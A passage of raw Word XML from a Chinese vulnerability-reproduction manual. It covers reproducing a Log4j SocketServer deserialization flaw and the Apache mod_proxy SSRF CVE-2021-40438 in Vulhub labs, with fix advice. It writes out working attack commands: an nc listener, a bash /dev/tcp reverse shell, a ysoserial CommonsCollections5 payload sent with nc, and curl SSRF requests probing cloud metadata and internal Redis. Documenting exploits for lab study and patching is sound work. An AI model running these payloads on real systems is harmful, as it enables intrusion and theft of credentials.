      </w:r>
    </w:p>
    <w:p w14:paraId="7595C25F" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>进入Log4j容器，检查/tmp目录：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4EAF73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docker exec &lt;container_id&gt; ls /tmp/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t># 预期输出包含 log4j-success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAD88D9" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>步骤三：反弹Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0267BDE9" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>先生成base64编码的反弹Shell命令，再用ysoserial生成Payload发送：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ED3549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# 攻击机监听</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>nc -lvvp 9090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# 生成并发送Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>bash -i &gt;&amp; /dev/tcp/192.168.1.200/9090 0&gt;&amp;1 | base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t># 将base64结果填入以下命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>java -jar ysoserial.jar CommonsCollections5 \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMjAwLzkwOTAgMD4mMQ==}|{base64,-d}|{bash,-i}" \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  | nc 192.168.1.100 4712</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072220B8" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.6 </w:t>
      </w:r>
      <w:r>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434DEC3D" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>① 升级至Apache Log4j 2.8.2及以上版本。官方在该版本中为TcpSocketServer增加了ObjectInputFilter支持，默认只允许反序列化Log4j的日志事件类。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6CBF3F" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>② 如非必要，不要启动Log4j的SocketServer功能；如必须使用，应限制4712端口仅监听127.0.0.1或通过防火墙限制访问来源。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F19A9F" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>③ 在JVM启动参数中配置全局反序列化过滤器（-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Djdk.serialFilter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>），限制可反序列化的类。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C58B39" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t xml:space="preserve">④ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>排查并移除类路径上不必要的CommonsCollections等存在已知Gadget链的依赖库</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197ACBCC" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E90C88" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第十章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  Apache HTTP Server mod_proxy SSRF</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>CVE-2021-40438</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05927276" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.1 </w:t>
      </w:r>
      <w:r>
        <w:t>漏洞概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3DBD0E" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Apache HTTP Server（俗称httpd或Apache）是Apache基金会旗下的开源Web服务器，也是全球使用最广泛的Web服务器之一。mod_proxy是Apache的代理模块，支持正向代理与反向代理功能。在Apache HTTP Server 2.4.48及以前版本中，mod_proxy模块在处理包含"unix:"前缀的请求路径时存在逻辑缺陷，攻击者可通过构造特殊的URI路径，控制反向代理的目标地址，使Apache服务器向任意内部或外部服务发起请求，形成服务端请求伪造（SSRF）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018AB807" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.2 </w:t>
      </w:r>
      <w:r>
        <w:t>影响版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C29446" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Apache HTTP Server &lt;= 2.4.48（需启用mod_proxy模块且配置了ProxyPass或ProxyPassMatch）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BF0FF4" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.3 </w:t>
      </w:r>
      <w:r>
        <w:t>代码级成因剖析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD3F6BC" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（1）mod_proxy的Unix域套接字支持</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAD3DC7" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>mod_proxy支持通过Unix Domain Socket（UDS）与后端服务通信，其URL格式为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3327A69A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proxy:unix:/path/to/socket|http://backend/path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132F3B56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其中，"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:"前缀指定Unix域套接字路径，竖线"|"后的部分是实际要请求的HTTP URL。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mod_proxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在解析这个URL时，会先提取套接字路径，连接到UDS，然后通过该套接字发送HTTP请求到指定的后端地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16042078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（2）漏洞触发：路径缓冲区处理缺陷</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375E6759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漏洞的核心在于</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mod_proxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在解析请求URI中的"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:"部分时，对套接字路径长度的处理存在缺陷。当攻击者构造一个包含超长填充字符串的"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:"路径时，内部缓冲区处理逻辑会出现异常，导致竖线"|"后的目标URL被错误地当作代理目标，而非通过UDS转发。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAF8D4F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 xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>恶意请求格式</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">GET </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:AAAA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>...AAAA(约4096个A)|http://example.com/ HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Host: vulnerable-apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CCF095" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>具体来说，mod_proxy在处理proxy路径时，会调用ap_proxy_de_socket()或类似函数解析"unix:"前缀。当unix:和|之间的填充字符串长度达到约4096字节时，内部的字符串处理逻辑（如apr_pstrcat或缓冲区复制）会出现边界问题，导致解析器错误地将|后的http://example.com/识别为代理目标地址，而不是通过UDS转发的路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493658A6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（3）正常流程与异常流程对比</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F3ADF3" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>正常情况下，当Apache收到请求并匹配到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ProxyPass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>配置时，会将请求转发到配置中指定的后端地址。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>例如配置ProxyPass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> / http://internal:8080/时，所有请求都会被转发到internal:8080。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53650E5B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# 正常流程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>请求 /index.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  -&gt; 匹配 ProxyPass / http://internal:8080/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  -&gt; 转发到 http://internal:8080/index.html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# 异常流程（SSRF）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>请求 /?unix:AAAA...AAAA|http://attacker.com/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  -&gt; mod_proxy 解析 unix: 路径时缓冲区异常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  -&gt; 错误地将 http://attacker.com/ 识别为代理目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  -&gt; 转发到 http://attacker.com/ （而非配置的internal:8080）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E4930C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（4）利用条件与限制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EA12F7" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>该漏洞的利用需要满足以下条件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E6853D" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t xml:space="preserve">① </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mod_proxy模块已启用（LoadModule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>proxy_module</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> modules/mod_proxy.so）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D926A7F" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>② 配置了ProxyPass或ProxyPassMatch规则，使请求会经过mod_proxy处理；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050C7537" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">③ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:和|之间的填充字符串长度需要足够（约4092字节以上，少于也可能触发，但不少于一定阈值）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F961BF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利用该漏洞，攻击者可以让Apache服务器访问内网中的其他服务（如Redis、MySQL管理接口、</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>云服务</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>元数据API等），也可以访问外部任意URL。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F27C103" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（5）漏洞根因总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33248E1F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该漏洞的本质是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mod_proxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在解析"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>unix:UDS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>路径|URL"格式时，对超长UDS路径的处理存在边界逻辑错误。正常情况下，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:后的内容应该被当作Unix域套接字路径处理，但当路径超长时，内部的字符串分割逻辑失效，导致竖线后的URL被错误地提取为代理目标。这是一个典型的C语言字符串处理边界漏洞，CVSS v3评分为9.0（Critical）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6D02D2" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>实验环境</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D11F7AD" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>靶机：Vulhub Apache CVE-2021-40438环境，监听80端口，已启用mod_proxy并配置ProxyPass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555762F7" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>攻击机：Kali Linux，安装curl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147C83A3" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.5 </w:t>
      </w:r>
      <w:r>
        <w:t>漏洞复现步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D2B8E5" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>步骤一：构造SSRF Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0BD0E7" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>使用curl构造包含超长填充的请求，将代理目标指向example.com：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725A1218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>curl -v "http://192.168.1.100/?unix:$(python3 -c 'print("A"*4096)')|http://example.com/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04751D4E" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>步骤二：验证SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF1F31C" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>如果响应中包含"Example Domain"页面内容，说明Apache已将请求转发到example.com，SSRF利用成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C082E5F" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>步骤三：探测内网服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E7CB00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将目标替换为内网地址，探测内网服务：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6763ACB1" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>探测云服务元数据</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>curl "http://192.168.1.100/?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:$(python3 -c 'print("A"*4096)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>')|</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>http://169.254.169.254/latest/meta-data/"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t># 探测内网Redis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>curl "http://192.168.1.100/?unix:$(python3 -c 'print("A"*4096)')|http://127.0.0.1:6379/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E4FF81" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.6 </w:t>
      </w:r>
      <w:r>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2AE5B5" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>① 升级至Apache HTTP Server 2.4.49及以上版本。官方在该版本中修复了mod_proxy对unix:路径的解析逻辑，增加了路径长度校验和边界检查。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BB35AF" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>② 如无法立即升级，可通过mod_rewrite或ModSecurity规则拦截包含"unix:"的请求路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260747D4" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
